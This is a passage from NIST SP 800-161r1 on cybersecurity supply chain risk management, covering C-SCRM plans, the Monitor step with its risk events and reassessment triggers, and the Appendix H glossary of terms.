enterprise’s risk decisions with its strategic imperatives. Robust definitions of risk appetite and
tolerance may also enable enterprises to delegate risk decision responsibility to lower levels of
the enterprise and provide greater autonomy across all levels.
Within Level 1 and Level 2, the resulting decisions should be documented with any changes to
requirements or selected common control baselines (i.e., enterprise or mission and business
71 More information Risk Response Frameworks and explicit examples can be found on in Appendix B.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
291
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
process level) within C-SCRM-specific Risk Response Frameworks. The C-SCRM Risk
Response Framework may influence other related Risk Response Frameworks.
The Risk Response Framework should include:
• A description of the threat source, threat event, exploited vulnerability, and threat event
outcome;
• An analysis of the likelihood and impact of the risk and final risk exposure;
• A description of the selected mitigating strategies and controls along with an estimate of
the cost and effectiveness of the mitigation against the risk.
Within Level 3, the resulting decision and the selected and tailored controls should be
documented in a C-SCRM plan. While the C-SCRM plan is ideally developed proactively, it
may also be developed in response to a supply chain cybersecurity compromise. Ultimately, the
C-SCRM plan should cover the full SDLC, document a C-SCRM baseline, and identify
cybersecurity supply chain requirements and controls at the Level 3 operational level. The C-
SCRM plan should be revised and updated based on the output of cybersecurity supply chain
monitoring.
C-SCRM plans should:
• Summarize the environment as determined in the Frame step, such as applicable policies,
processes, and procedures based on enterprise and mission requirements currently
implemented in the enterprise
• State the role responsible for the plan, such as Risk Executive, Chief Financial Officer
(CFO), Chief Information Officer (CIO), program manager, or system owner
• Identify key contributors, such as CFO, Chief Operations Officer (COO),
acquisition/contracting, procurement, C-SCRM PMO, system engineer, system security
engineer, developer/maintenance engineer, operations manager, or system architect
• Provide the applicable (per level) set of risk mitigation measures and controls resulting
from the evaluation of alternatives (in the Respond step)
• Provide tailoring decisions for selected controls, including the rationale for the decision
• Describe feedback processes among the levels to ensure that cybersecurity supply chain
interdependencies are addressed
• Describe monitoring and enforcement activities (including auditing, if appropriate)
applicable to the scope of each specific C-SCRM plan
• If appropriate, state qualitative or quantitative measures to support the implementation of
the C-SCRM plan and assess the effectiveness of the implementation72
• Define a frequency for reviewing and revising the plan
• Include criteria that would trigger revision, such as life cycle milestones, gate reviews, or
significant contracting activities
72 NIST SP 800-55, Rev. 1, Performance Measurement Guide for Information Security (July 2008), provides guidance on
developing information security measures. Agencies can use general guidance in that publication to develop specific measures
for their C-SCRM plans. See http://csrc.nist.gov/publications/nistpubs/800-55-Rev1/SP800-55-rev1.pdf.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
292
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Include suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers in C-SCRM plans if they are made available as
part of agreements
Agencies may want to integrate C-SCRM controls into the respective system security plans or
develop separate operational-level C-SCRM plans. At Level 3, the C-SCRM plan applies to
high-and moderate-impact systems, per [FIPS 199]. Requirements and inputs from the enterprise
C-SCRM strategy at Level 1 and the mission C-SCRM strategy and implementation plan at
Level 2 should flow down and be used to guide the develop C-SCRM plans at Level 3.
Conversely, the C-SCRM controls and requirements at Level 3 should be considered when
developing and revising the requirements and controls applied at the higher levels. C-SCRM
plans should be interconnected and reference each other when appropriate.
Table G-9 summarizes the controls to be contained in Risk Response Frameworks at Level 1 and
Level 2, the C-SCRM plans at Level 3, and examples of those controls.
Table G-9: Controls at Levels 1, 2, and 3
Level
Controls
Examples
Level 1
Provides enterprise
common control baselines
to Level 2 and Level 3
• Minimum sets of controls applicable to all
suppliers, developers, system integrators, external
system service providers, and other ICT/OT-
related service providers
• Enterprise-level controls applied to processing and
storing supplier, developer, system integrator,
external system service provider, and other
ICT/OT-related service provider information
• Cybersecurity supply chain training and
awareness for acquirer staff at the enterprise level
Level 2
• Inherits common controls
from Level 1
• Provides mission and
business process-level
common controls
baseline to Level 3
• Provides feedback to
Level 1 about what is
working and what needs
to be changed
• Minimum sets of controls applicable to suppliers,
developers, system integrators, external system
service providers, and other ICT/OT-related
service providers for the specific mission and
business process
• Program-level refinement of Identity and Access
Management controls to address C-SCRM
concerns
• Program-specific supply chain training and
awareness
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
293
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level
Controls
Examples
Level 3
• Inherits common controls
from Level 1 and Level 2
• Provides system-specific
controls for Level 3
• Provides feedback to
Level 1 and Level 2
about what is working
and what needs to be
changed
• Minimum sets of controls applicable to service
providers or specific hardware and software for
the individual system
• Appropriately rigorous acceptance criteria for
change management for systems that support the
supply chain (e.g., as testing or integrated
development environments)
• System-specific cybersecurity supply chain
training and awareness
• Intersections with the SDLC
Appendix C provides an example C-SCRM plan template with the sections and types of
information that enterprises should include in their C-SCRM planning activities.
RISK RESPONSE IMPLEMENTATION
TASK 3-4: Implement the course of action selected to respond to risk.
Enterprises should implement the C-SCRM plan in a manner that integrates the C-SCRM
controls into the overall agency risk management processes.
Outputs and Post Conditions
The output of this step is a set of C-SCRM controls that address C-SCRM requirements and can
be incorporated into the system requirements baseline and agreements with third-party providers.
These requirements and resulting controls will be incorporated into the SDLC and other
enterprise processes throughout the three levels.
For general risk types, this step results in:
• Selected, evaluated, and tailored C-SCRM controls that address identified risks;
• Identified consequences of accepting or not accepting the proposed mitigations; and
• Development and implementation of the C-SCRM plan.
Monitor
INPUTS AND PRECONDITIONS
Monitor is the step in which enterprises 1) verify compliance, 2) determine the ongoing
effectiveness of risk response measures, and 3) identify risk-impacting changes to enterprise
information systems and environments of operation.
Changes to the enterprise, mission and business processes, operations, or the supply chain can
directly impact the enterprise’s cybersecurity supply chain. The Monitor step provides a
mechanism for tracking such changes and ensuring that they are appropriately assessed for
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
294
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
impact (in the Assess step). If the cybersecurity supply chain is redefined as a result of
monitoring, enterprises should coordinate with their suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers to resolve
implications and mutual obligations. A critical component of the Monitor step includes the
upward dissemination of information to inform higher level risk assessments (e.g., mission and
business process assessment informs enterprise assessment). This ensures that enterprise leaders
maintain visibility into risk conditions across the enterprise.
Enterprises should monitor for supply chain risk events to reassess risk and determine
appropriate risk responses. This should include determining whether the event has triggered an
incident or compels the need for information sharing. Examples of supply chain risk events
include:
• Change of ownership, merger, or acquisition
• Disruption to the supply chain
• Continuity or emergency event that affects a source or its supply chain
• Ransomware or other cybersecurity attack that affects a source or its supply chain
• New information about a critical vulnerability that may or does affect technology
used by the source and/or its supply chain
• Discovery of a counterfeit or non-conforming product or component
• Change in location for manufacturing or software development, especially
changes from domestic to foreign locations
• OEM no longer produces and/or supports a product or critical component of a
product
• Evidence of non-disclosed functionality or features of a covered article
• Any notification that requires additional investigation to determine whether the
confidentiality, integrity, and availability of the Federal Government’s data and
information systems can be directly attributed to an attack involving the
refurbishment, tampering, and counterfeiting of ICT products
• Presence of covered articles produced by a prohibited or otherwise non-authorized
source
• Evidence of suspicious Foreign Ownership, Control, or Influence (FOCI)
• Other changes that may negatively affect the risk profile of the source, the
covered article, and/or the associated supply chain (e.g., loss of key personnel,
degradation of the company’s financial health, etc.)
Enterprises should integrate C-SCRM into existing continuous monitoring programs.73 In the
event that a continuous monitoring program does not exist, C-SCRM can serve as a catalyst for
establishing a comprehensive continuous monitoring program. Figure G-7 depicts the Monitor
step with inputs and outputs along the three enterprise levels.
73 NIST SP 800-137, Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations
(September 2011), describes how to establish and implement a continuous monitoring program. See
http://csrc.nist.gov/publications/nistpubs/800-137/SP800-137-Final.pdf.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
295
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. G-8: C-SCRM in the Monitor Step74
Activities
RISK MONITORING STRATEGY
TASK 4-1: Develop a risk monitoring strategy for the enterprise that includes the purpose, type,
and frequency of monitoring activities.
74 More detailed information on the Risk Management Process can be found in Appendix C.
Inputs
Monitor
Outputs
Enterprise
Mission/Business Process
Operational
• Output of Level 1 C-
SCRM
Risk Framing
• C-SCRM High-Level
Implementation Plan
• enterprise-level
cybersecurity risks in
the supply chain
response decisions
• enterprise's Continuous
Monitoring Strategy
• Risk assessment results
(All Levels)
• Integrate C-SCRM into
agency Continuous
Monitoring program
• Monitor enterprise-
level operations,
assets, and
individuals to
–
Verify internal and
supply chain C-
SCRM compliance
–
Determine
effectiveness of C-
SCRM response
–
Identify internal
and supply chain
changes
• C-SCRM integrated into
agency Continuous
Monitoring program
• Regular reporting as a
part of Continuous
Monitoring Program
• Areas of improvement
based
on reporting
• New or changed
constraints that would
trigger re-assessment
of risk
• Output of Level 2 C-
SCRM
Risk Framing
• C-SCRM
Implementation Plan
• Mission/business-
specific cybersecurity
risks in the supply
chain response
decisions
• Applicable POA&Ms
• Mission/business-
specific Continuous
Monitoring strategy
• Risk assessment results
(All Levels)
• Identify mission
functions to be
monitored for C-SCRM
change and assessed
for impact
• Integrate C-SCRM into
Continuous Monitoring
processes and systems
• Monitor
mission/business-
specific operations,
assets, and
individuals to
–
Verify internal and
supply chain C-
SCRM compliance
–
Determine
effectiveness of C-
SCRM response
–
Identify internal
and supply chain
changes
• C-SCRM Supply Chain
integrated into
mission/business-
specific Continuous
Monitoring program
• Regular reporting as a
part of Continuous
Monitoring Program
• Areas of improvement
based
on reporting
• New or changed
constraints that would
trigger re-assessment
of risk
• Operational-level
Continuous
Monitoring Activities
• Operational C-SCRM
Requirements
• Operational-specific
cybersecurity risks in
the supply chain
decisions
• C-SCRM Plan
• Operational-level risk
assessment Results
• Monitor
mission/business-
specific operations,
assets, and
individuals to
–
Verify internal and
supply chain C-
SCRM compliance
–
Determine
effectiveness of C-
SCRM response
–
Identify c internal
and supply chain
changes
• C-SCRM integrated into
Operational-level
Continuous Monitoring
• Regular reporting as a
part of Continuous
Monitoring activities
• Areas of improvement
based
on reporting
• New or changed
constraints that would
trigger re-assessment
of risk
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
296
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental Guidance
Enterprises should integrate C-SCRM considerations into their overall risk monitoring strategy.
Monitoring cybersecurity risks throughout the supply chain may require access to information
that agencies may not have traditionally collected. Some of the information will need to be
gathered from outside of the agency, such as from open sources, suppliers, or integrators. The
strategy should, among other things, include the data to be collected, state the specific measures
compiled from the data (e.g., number of contractual compliance violations by the vendor),
identify existing assumptions about the required tools needed to collect the data, identify how the
data will be protected, and define reporting formats for the data. Potential data sources may
include:
• Agency vulnerability management and incident management activities;
• Agency manual reviews;
• Interagency information sharing;
• Information sharing between the agency and suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers;
• Supplier information sharing; and
• Contractual reviews of suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers.
Enterprises should ensure the appropriate protection of supplier data if that data is collected and
stored by the agency. Agencies may also require additional data collection and analysis tools to
appropriately evaluate the data to achieve the objective of monitoring applicable cybersecurity
risks throughout the supply chain.
RISK MONITORING
TASK 4-2: Monitor enterprise information systems and environments of operation on an
ongoing basis to verify compliance, determine the effectiveness of risk response measures, and
identify changes.
According to [NIST SP 800-39], enterprises should monitor compliance, effectiveness, and
change. Monitoring compliance within the context of C-SCRM involves monitoring an
enterprise’s processes and supplied products and services for compliance with the established
security and C-SCRM requirements. Monitoring effectiveness involves monitoring the resulting
risks to determine whether the established security and C-SCRM requirements produce the
intended results. Monitoring change involves monitoring the environment for any changes that
would signal changing requirements and mitigations/controls to maintain an acceptable level of
cybersecurity risks throughout the supply chain.
To monitor for changes, enterprises should establish regular intervals at which they review
suppliers and their supplied products and services. The reassessment intervals should be
determined as needed and appropriate for the enterprise. Enterprises also need to identify and
document a set of off-cycle triggers that would signal an alteration to the state of cybersecurity
risks throughout the supply chain. While the categories of triggers will likely include changes to
constraints as identified in Table D-6 (during the Frame step) – such as policy, mission, change
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
297
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
to the threat environment, enterprise architecture, SDLC, or requirements – the specific triggers
within those categories may be substantially different for different enterprises.
An example of a cybersecurity supply chain change is two key vetted suppliers75 announcing
their departure from a specific market, therefore creating a supply shortage for specific
components. This would trigger the need to evaluate whether reducing the number of suppliers
could create vulnerabilities in component availability and integrity. In this scenario, a potential
deficit of components may result from an insufficient supply of components. If none of the
remaining suppliers are vetted, this deficit may result in the uncertain integrity of the remaining
components. If the enterprise policy directs the use of vetted components, this event may result
in the enterprise’s inability to fulfill its mission needs. Supply chain change may also arise as a
result of a company experiencing a change in ownership. A change in ownership could have
significant implications, especially in cases where the change involves a transfer of ownership to
individuals who are citizens of a different country from that of the original owners.
In addition to regularly updating existing risk assessments at all levels of the enterprise with the
results of ongoing monitoring, the enterprise should determine the triggers of a reassessment.
Some triggers may include the availability of resources, changes to cybersecurity risks
throughout the supply chain, natural disasters, or mission collapse.
In order for monitoring to be effective, the state of cybersecurity supply chain risk management
needs to be communicated to decision makers across the enterprise in the form of C-SCRM
reporting. Reporting should be tailored to meet the specific needs of its intended audience. For
example, reporting to Level 1 decision makers may summarize the C-SCRM implementation
coverage, efficiency, effectiveness, and overall levels of exposure to cybersecurity risks
throughout the supply chain at aggregate levels across the enterprise. Where applicable and
appropriate for the audience, reporting may focus on specific areas in Level 2 and Level 3 that
require executive leadership attention. To aid in tailoring reporting, reporting requirements
should be defined in collaboration with the intended audience and updated periodically to ensure
that it remains efficient and effective.
Outputs and Post Conditions
Enterprises should integrate the cybersecurity supply chain outputs of the Monitor step into the
C-SCRM plan. This plan will provide inputs into iterative implementations of the Frame, Assess,
and Respond steps as required.
75 A vetted supplier is one with whom the organization is comfortable doing business. This level of comfort is usually achieved
through the development of an organization-defined set of supply chain criteria and then vetting suppliers against those criteria.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
298
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX H: GLOSSARY
Term
Definition
acceptable risk
A level of residual risk to the organization’s operations, assets,
or individuals that falls within the defined risk appetite and
risk tolerance by the organization.
acquirer
[ISO/IEC/IEEE 15288,
adapted]
Organization or entity that acquires or procures a product or
service.
acquisition
[NIST SP 800-64, adapted]
Includes all stages of the process of acquiring product or
services, beginning with the process for determining the need
for the product or services and ending with contract
completion and closeout.
agreement
Mutual acknowledgement of terms and conditions under which
a working relationship is conducted, or goods are transferred
between parties. EXAMPLE: contract, memorandum, or
agreement
authorization boundary
[NIST SP 800-53 Rev. 5]
All components of an information system to be authorized for
operation by an authorizing official. This excludes separately
authorized systems to which the information system is
connected.
authorizing official
[NIST SP 800-53 Rev. 5]
A senior Federal official or executive with the authority to
authorize (i.e., assume responsibility for) the operation of an
information system or the use of a designated set of common
controls at an acceptable level of risk to agency operations
(including mission, functions, image, or reputation), agency
assets, individuals, other organizations, and the Nation.
authorization to operate
[NIST SP 800-53 Rev. 5]
The official management decision given by a senior Federal
official or officials to authorize operation of an information
system and to explicitly accept the risk to agency operations
(including mission, functions, image, or reputation), agency
assets, individuals, other organizations, and the Nation based
on the implementation of an agreed-upon set of security and
privacy controls. Authorization also applies to common
controls inherited by agency information systems.
baseline
[CNSSI 4009]
Hardware, software, databases, and relevant documentation for
an information system at a given point in time.
C-SCRM control
A safeguard or countermeasures prescribed for the purpose of
reducing or eliminating the likelihood and/or
impact/consequences of cybersecurity risks throughout the
supply chain.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
299
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
cybersecurity compromise
in the supply chain
A cybersecurity incident in the supply chain (also known as
compromise) is an occurrence within the supply chain whereby
the confidentiality, integrity, or availability of a system or the
information the system processes, stores, or transmits is
jeopardized. A supply chain incident can occur anywhere
during the life cycle of the system, product or service.
cybersecurity risks
throughout the supply
chain
The potential for harm or compromise arising from suppliers,
their supply chains, their products, or their services.
Cybersecurity risks throughout the supply chain arise from
threats that exploit vulnerabilities or exposures within products
and services traversing the supply chain as well as threats
exploiting vulnerabilities or exposures within the supply chain
itself.
cybersecurity supply chain
risk assessment
A systematic examination of cybersecurity risks throughout
the supply chain, likelihoods of their occurrence, and potential
impacts.
cybersecurity supply chain
risk management
A systematic process for managing exposure to cybersecurity
risks throughout the supply chain and developing appropriate
response strategies, policies, processes, and procedures.
Note: For the purposes of NIST publications SCRM and C-
SCRM refer to the same concept. This is because NIST is
addressing only the cybersecurity aspects of SCRM. Other
organizations may use a different definition of SCRM which is
outside the scope of this publication. This publication does not
address many of the non-cybersecurity aspects of SCRM.
defense-in-breadth
[NIST SP 800-53 Rev. 5]
A planned, systematic set of multidisciplinary activities that
seek to identify, manage, and reduce risk of exploitable
vulnerabilities at every stage of the system, network, or
subcomponent life cycle, including system, network, or
product design and development; manufacturing; packaging;
assembly; system integration; distribution; operations;
maintenance; and retirement.
degradation
A decline in quality or performance; the process by which the
decline is brought about.
developer
[NIST SP 800-53 Rev. 5,
adapted]
A general term that includes developers or manufacturers of
systems, system components, or system services; systems
integrators; suppliers; and product resellers. Development of
systems, components, or services can occur internally within
organizations or through external entities.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
300
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
element
See supply chain element.
enhanced overlay
An overlay that adds processes, controls, enhancements, and
additional implementation guidance specific to the purpose of
the overlay.
exposure
[ISO Guide 73, adapted]
Extent to which an organization and/or stakeholder is subject
to a risk
external system service
[NIST SP 800-53 Rev. 5]
A system service that is provided by an external service
provider and for which the organization has no direct control
over the implementation of required security and privacy
controls or the assessment of control effectiveness.
external system service
provider
[NIST SP 800-53 Rev. 5]
A provider of external system services to an organization
through a variety of consumer-producer relationships,
including joint ventures, business partnerships, outsourcing
arrangements (i.e., through contracts, interagency agreements,
lines of business arrangements), licensing agreements, and/or
supply chain exchanges.
fit for purpose
[ITIL Service Strategy,
adapted]
Used informally to describe a process, configuration item, IT
service, etc., that is capable of meeting its objectives or service
levels. Being fit for purpose requires suitable design,
implementation, control, and maintenance.
ICT/OT-related service
providers
Any organization or individual providing services which may
include authorized access to an ICT or OT system
impact
[NIST SP 800-53 Rev. 5]
The effect on organizational operations, organizational assets,
individuals, other organizations, or the Nation (including the
national security interests of the United States) of a loss of
confidentiality, integrity, or availability of information or a
system.
Information and
Communications
Technology
[ISO/IEC 2382, adapted]
Encompasses the capture, storage, retrieval, processing,
display, representation, presentation, organization,
management, security, transfer, and interchange of data and
information.
information system
[NIST SP 800-53 Rev. 5]
A discrete set of information resources organized for the
collection, processing, maintenance, use, sharing,
dissemination, or disposition of information.
life cycle
[ISO/IEC/IEEE 15288,
adapted]
Evolution of a system, product, service, project, or other
human-made entity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
301
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
likelihood
[ISO/IEC 27000]
Chance of something happening.
materiality
1) U.S. Supreme Court in
TSC Industries v. Northway,
426 U.S. 438, 449 (1976)
2) Commission Statement
and Guidance on Public
Company Cybersecurity
Disclosures), SECURITIES
AND EXCHANGE
COMMISSION 17 CFR
Parts 229 and 249 [Release
Nos. 33-10459; 34-82746]
1) The standard of materiality articulated by the U.S. Supreme
Court in TSC Industries v. Northway, 426 U.S. 438, 449
(1976) (a fact is material “if there is a substantial likelihood
that a reasonable shareholder would consider it important” in
making an investment decision or if it “would have been
viewed by the reasonable investor as having significantly
altered the ‘total mix’ of information made available” to the
shareholder).
2) The materiality of cybersecurity risks or incidents depends
upon their nature, extent, and potential magnitude, particularly
as they relate to any compromised information or the business
and scope of company operations. The materiality of
cybersecurity risks and incidents also depends on the range of
harm that such incidents could cause. This includes harm to a
company’s reputation, financial performance, and customer
and vendor relationships, as well as the possibility of litigation
or regulatory investigations or actions, including regulatory
actions by state and federal governmental authorities and non-
U.S. authorities.
organizational user
[NIST SP 800-53 Rev. 5,
adapted]
An organizational employee or an individual the organization
deemed to have similar status of an employee including, for
example, contractor, guest researcher, or individual detailed
from another organization.
overlay
[NIST SP 800-53 Rev. 5]
A specification of security or privacy controls, control
enhancements, supplemental guidance, and other supporting
information employed during the tailoring process, that is
intended to complement (and further refine) security control
baselines. The overlay specification may be more stringent or
less stringent than the original security control baseline
specification and can be applied to multiple information
systems.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
302
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
pedigree
The validation of the composition and provenance of
technologies, products, and services is referred to as the
pedigree. For microelectronics, this includes material
composition of components. For software this includes the
composition of open source and proprietary code, including
the version of the component at a given point in time.
Pedigrees increase the assurance that the claims suppliers
assert about the internal composition and provenance of the
products, services, and technologies they provide are valid.
program manager
See system owner.
provenance
[NIST SP 800-53 Rev. 5]
The chronology of the origin, development, ownership,
location, and changes to a system or system component and
associated data. It may also include personnel and processes
used to interact with or make modifications to the system,
component, or associated data.
residual risk
[NIST SP 800-16, adapted]
Portion of risk remaining after controls/countermeasures have
been applied.
risk
[NIST SP 800-39]
A measure of the extent to which an entity is threatened by a
potential circumstance or event, and typically a function of: (i)
the adverse impacts that would arise if the circumstance or
event occurs; and (ii) the likelihood of occurrence.
risk appetite
[NISTIR 8286]
The types and amount of risk, on a broad level, [an
organization] is willing to accept in its pursuit of value.
risk framing
[NIST SP 800-39]
The set of assumptions, constraints, risk tolerances, and
priorities/trade-offs that shape an organization’s approach for
managing risk.
risk management
[NIST SP 800-53 Rev. 5]
The program and supporting processes to manage risk to
agency operations (including mission, functions, image,
reputation), agency assets, individuals, other organizations,
and the Nation, and includes establishing the context for risk-
related activities; assessing risk; responding to risk once
determined; and monitoring risk over time.
risk mitigation
[NIST SP 800-53 Rev. 5]
Prioritizing, evaluating, and implementing the appropriate risk-
reducing controls/countermeasures recommended from the risk
management process.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
303
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
risk response
[NIST SP 800-53 Rev. 5,
adapted]
Intentional and informed decision and actions to accept, avoid,
mitigate, share, or transfer an identified risk.
risk response plan
A summary of potential consequence(s) of the successful
exploitation of a specific vulnerability or vulnerabilities by a
threat agent, as well as mitigating strategies and C-SCRM
controls.
risk tolerance
[NIST 8286, adapted]
The organization’s or stakeholder’s readiness to bear the
remaining risk after responding to or considering the risk in
order to achieve its objectives.
secondary market
An unofficial, unauthorized, or unintended distribution
channel.
security control
[NIST SP 800-53 Rev. 5]
The safeguards or countermeasures prescribed for an
information system or an organization to protect the
confidentiality, integrity, and availability of the system and its
information.
software bill of materials
Exec. Order No. 14028,
supra note 1, § 10(j)
A formal record containing the details and supply chain
relationships of various components used in building software.
Software developers and vendors often create products by
assembling existing open source and commercial software
components. The SBOM enumerates these components in a
product.
supplier
[ISO/IEC/IEEE 15288,
adapted]
[NIST SP 800-53 Rev. 5,
adapted from definition of
“developer”]
Organization or individual that enters into an agreement with
the acquirer or integrator for the supply of a product or service.
This includes all suppliers in the supply chain, developers or
manufacturers of systems, system components, or system
services; systems integrators; suppliers; product resellers; and
third-party partners.
supply chain
[ISO 28001, adapted]
Linked set of resources and processes between and among
multiple levels of organizations, each of which is an acquirer,
that begins with the sourcing of products and services and
extends through their life cycle.
supply chain element
Organizations, entities, or tools employed for the research and
development, design, manufacturing, acquisition, delivery,
integration, operations and maintenance, and/or disposal of
systems and system components.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
304
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
supply chain risk
information
[FASCA]
Includes, but is not limited to, information that describes or
identifies: (1) Functionality of covered articles, including
access to data and information system privileges; (2)
Information on the user environment where a covered article is
used or installed; (3) The ability of the source to produce and
deliver covered articles as expected (i.e., supply chain
assurance); (4) Foreign control of, or influence over, the
source (e.g., foreign ownership, personal and professional ties
between the source and any foreign entity, legal regime of any
foreign country in which the source is headquartered or
conducts operations); (5) Implications to national security,
homeland security, and/or national critical functions associated
with use of the covered source; (6) Vulnerability of federal
systems, programs, or facilities; (7) Market alternatives to the
covered source; (8) Potential impact or harm caused by the
possible loss, damage, or compromise of a product, material,
or service to an organization’s operations or mission; (9)
Likelihood of a potential impact or harm, or the exploitability
of a system; (10) Security, authenticity, and integrity of
covered articles and their supply and compilation chain; (11)
Capacity to mitigate risks identified; (12) Credibility of and
confidence in other supply chain risk information; (13) Any
other information that would factor into an analysis of the
security, integrity, resilience, quality, trustworthiness, or
authenticity of covered articles or sources; (14) A summary of
the above information and, any other information determined
to be relevant to the determination of supply chain risk.
system
[NIST SP 800-53 Rev. 5,
adapted]
Combination of interacting elements organized to achieve one
or more stated purposes.
Note 1: There are many types of systems. Examples include
general and special-purpose information systems; command,
control, and communication systems; crypto modules; central
processing unit and graphics processor boards; industrial
control systems; flight control systems; weapons, targeting,
and fire control systems; medical devices and treatment
systems; financial, banking, and merchandising transaction
systems; and social networking systems.
Note 2: The interacting elements in the definition of system
include hardware, software, data, humans, processes, facilities,
materials, and naturally occurring physical entities.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
305
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
Note 3: System-of-systems is included in the definition of
system.
system assurance
[NDIA]
The justified confidence that the system functions as intended
and is free of exploitable vulnerabilities, either intentionally or
unintentionally designed or inserted as part of the system at
any time during the life cycle.
system component
A discrete identifiable information or operational technology
asset that represents a building block of a system and may
include hardware, software, and firmware.
system development life
cycle
[NIST SP 800-34 Rev. 1,
adapted]
The scope of activities associated with a system, encompassing
the system’s initiation, development and acquisition,
implementation, operation and maintenance, and ultimately its
disposal.
system integrator
Those organizations that provide customized services to the
acquirer including for example, custom development, test,
operations, and maintenance.
system owner (or program
manager)
[NIST SP 800-53 Rev. 5]
Official responsible for the overall procurement, development,
integration, modification, or operation and maintenance of a
system.
threat
[NIST SP 800-53 Rev. 5]
Any circumstance or event with the potential to adversely
impact organizational operations, organizational assets,
individuals, other organizations, or the Nation through a
system via unauthorized access, destruction, disclosure,
modification of information, and/or denial of service.
threat analysis
See threat assessment.
threat assessment
[NIST SP 800-53 Rev. 5,
adapted]
Formal description and evaluation of threat to a system or
organization.
threat event
[NIST SP 800-30 Rev. 1]
An event or situation that has the potential for causing
undesirable consequences or impact.
threat event outcome
The effect a threat acting upon a vulnerability has on the
confidentiality, integrity, and/or availability of the
organization’s operations, assets, or individuals.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
306
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Term
Definition
threat scenario
[NIST SP 800-30 Rev. 1]
A set of discrete threat events, associated with a specific threat
source or multiple threat sources, partially ordered in time.
threat source
[NIST SP 800-53 Rev. 5]
The intent and method targeted at the intentional exploitation
of a vulnerability or a situation and method that may
accidentally trigger a vulnerability.
transparency
See visibility.
trust
[SwA]
The confidence one element has in another, that the second
element will behave as expected.
trustworthiness
[NIST SP 800-53 Rev. 5,
adapted]
The interdependent combination of attributes of a person,
system, or enterprise that provides confidence to others of the
qualifications, capabilities, and reliability of that entity to
perform specific tasks and fulfill assigned responsibilities. The
degree to which a system (including the technology
components that are used to build the system) can be expected
to preserve the confidentiality, integrity, and availability of the
information being processed, stored, or transmitted by the
system across the full range of threats.
validation
[ISO 9000]
Confirmation, through the provision of objective evidence, that
the requirements for a specific intended use or application
have been fulfilled.
Note: The requirements were met.
verification
[CNSSI 4009]
[ISO 9000, adapted]
Confirmation, through the provision of objective evidence, that
specified requirements have been fulfilled.
Note: The intended output is correct.
visibility
[ISO/IEC 27036, adapted]
Amount of information that can be gathered about a supplier,
product, or service and how far through the supply chain this
information can be obtained.
vulnerability
[NIST SP 800-53 Rev. 5]
Weakness in an information system, system security
procedures, internal controls, or implementation that could be
exploited or triggered by a threat source.
vulnerability assessment
[NIST SP 800-53 Rev. 5,
adapted]
Systematic examination of a system or product or supply chain
element to determine the adequacy of security measures,
identify security deficiencies, provide data from which to
predict the effectiveness of proposed security measures, and
confirm the adequacy of such measures after implementation.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
307
